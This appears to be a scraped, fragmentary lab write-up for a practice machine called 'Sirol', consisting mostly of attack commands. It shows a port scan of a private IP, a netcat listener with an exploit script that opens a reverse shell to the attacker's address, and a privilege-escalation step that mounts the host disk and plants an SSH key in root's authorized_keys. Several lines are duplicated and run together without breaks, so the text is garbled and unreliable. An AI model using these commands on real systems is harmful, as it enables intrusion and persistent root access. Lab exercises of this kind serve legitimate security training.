Sirol
nmap
nmap
sudo rustscan -a 192.168.225.54 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan
Web enumeration

Exploitation


Privilege Escalation


Last updated
nmap
sudo rustscan -a 192.168.225.54 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan





Last updated
sudo nc -lvnp 80python exploit.py -u http://192.168.225.54:5601 -host <your machine's IP> -port 80 --shellmkdir -p /mnt/hola
mount /dev/sda1 /mnt/holacd /mnt/hola/root
mkdir .ssh
cd .sshecho 'insert your public ssh key' > authorized_keys